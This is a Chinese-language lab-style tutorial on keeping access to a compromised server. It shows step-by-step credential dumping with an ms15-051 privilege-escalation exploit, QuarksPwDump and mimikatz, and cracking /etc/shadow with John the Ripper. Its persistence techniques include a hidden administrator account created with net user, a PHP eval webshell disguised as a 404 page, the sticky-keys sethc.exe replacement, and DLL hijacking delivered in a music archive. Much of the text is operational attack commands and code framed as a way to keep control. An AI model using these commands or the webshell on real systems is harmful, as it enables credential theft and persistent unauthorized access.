当攻击者获取服务器权限后,通常会采用一些后门技术来维持自己当前得到的权限,服务器一旦被植入后门,那么攻击者下次进入就方便多了。 由于攻击可能被发现,会清除一些shell,导致目标丢失,所以需要留下后门来维持权限,达到持续控制的目的。
实验一:获取windows系统登录账号
实验环境:windows2008
windows系统登陆账号存储位置:C:\Windows\System32\config\SAM
windows密码验证原理:
在Windows系统中,对用户账户的安全管理采用了SAM(Security Account Manager,安全账号管理)机制,用户账户以及密码经过Hash加密之后,都保存在SAM数据库中。
SAM数据库保存在C:\WINDOWS\system32\config\SAM文件中,当用户登录系统时,首先就要与SAM文件中存放的账户信息进行对比,验证通过方可登录。系统对SAM文件提供了保护机制,无法将其复制或是删除,也无法直接读取其中的内容。
-SAM文件两种加密方式介绍: LM加密和NTLM加密
对于Windows2003之前,包括win2003系统,采用的是LM口令散列,对于Windows 2003之后的系统,采用的是NTLM口令列。
LM和NTLM都是基于Hash加密,但是它们的安全机制和安全强度存在差别,LM口令散列的安全性相对比较差。尽管现在已很少有人使用Windows2k之前的老版本系统,但为了保持向后兼容性,默认情况下,系统仍会将用户密码分别用这两种机制加密后存放在SAM数据库里。
-两种加密方式的区别:
LM加密,密码最多14位,如果口令不足14位,不足的部分用0补齐,把所有的字符转变为大写,然后分成两组,每组7位,分别加密,然后拼接在一起,就是最终的LM散列,本质是DES加密。
NTLM加密,先将用户口令转变为unicode编码,再进行标准MD4单向哈希加密。
LM加密安全性远低于NTLM加密,因为NTLM加密它允许使用更长的密码,允许有大小写的不同,而且也无须把密码分割成更小、更易于被破解的块。所以在一个纯NTLM环境中,应该关闭Lan Manager加密方式。
实验步骤:
一、搭建环境
1.在wwwroot目录下上传一句话
2.菜刀连接
3.利用windows2008的系统漏洞进行提权
方法一:利用QuarksPwDump.exe获取密文
1.用菜刀上传工具:QuarksPwDump.exe
2.在菜刀命令行输入以下命令:
C:\Windows\Temp\ms15-051x64.exe "C:\Windows\Temp\QuarksPwDump.exe --dump-hash-local"
3.在cmd5上进行解码
方法二:利用工具mimikatz抓取账号明文
原理:从lsass.exe进程中直接获取密码信息进行破解,而且该破解应该并非穷举方式,而是直接根据算法进行反向计算
lsass.exe是系统进程,用于本地安全认证服务
1.上传mimikatz工具
2.在菜刀中输入以下命令获取明文密码:
C:\Windows\Temp\ms15-051x64.exe "C:\Windows\temp\mimikatz.exe privilege::debug sekurlsa::logonpasswords exit"
实验二:获取linux/unix系统登陆账号
系统账号密码储存位置:
账号:/etc/passwd 密码:/etc/shadow
实验环境:kali
使用工具:john the ripper
实验步骤:
破解密码,输入:
john --single /etc/shadow 
或指定字典破解:
john --wordlist list /etc/shadow2.查看密码:
安装后门程序
常见的后门技术有隐藏、克隆账户,隐藏webshell,shift后门,启动项、计划任务,DLL劫持技术,Powershell后门,远控软件等
实验目的:攻击者在获取服务器权限后,通常会用一些后门技术来维持服务器权限,服务器一旦被植入后门,攻击者如入无人之境
实验环境:windows2008
实验一:隐藏账户
1.常见一个隐藏用户:net user zs$ 123.com /add,并将其添加到管理员组:net localgroup aadministrators zs$ /add
2.利用新创建的隐藏用户登录,该用户便有了管理员权限
实验二:利用403或404页面隐藏webshell
1.复制404报错的源代码
2.新建一个文件,将代码写入,并加一句话木马,将55.php换成新建的文件名
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /666.php was not found on this server.</p>
</body></html>
<?php @eval($_REQUEST[666])?>3.当访问时就会出现404假象,即可用菜刀连接
实验三:windows shift 后门
实验原理:利用cmd.exe重命名,覆盖原来的粘连键。当我们再次触发粘连键时,相当于运行了cmd.exe
sethc.exe位置:Windows/System32/sethc.exe
实验内容:将cmd.exe 重命名并替换掉shift(粘滞键)(sethc.exe)功能,这样在通过远程桌面登录服务器之后,在输入帐号密码处,按5次shift即可弹出cmd的命令行,权限为system。
实验四:DLL劫持提权
DLL劫持原理举例:
例如你安装了酷狗播放器,而酷狗播放器在播放音乐的时候必须调用Windows系统下一个标准动态链接库mp3play.dll,那么黑客就自己开发一个恶意的mp3play.dll,然后再找一个MP3歌曲,将这个恶意的DLL和歌曲放在同一个文件夹下,然后打包压缩发给受害者。
如果受害者用右键将这个压缩包中的MP3文件和DLL文件都解压缩到了一个目录中(90%的人会这样干),那么当受害者点击这个MP3文件的时候,酷狗就会先去寻找mp3play.dll进行加载,而微软设计的加载dll顺序是先从默认文件本身的目录进行寻找,于是那个虚假的、恶意的mp3play.dll就先被加载运行了。
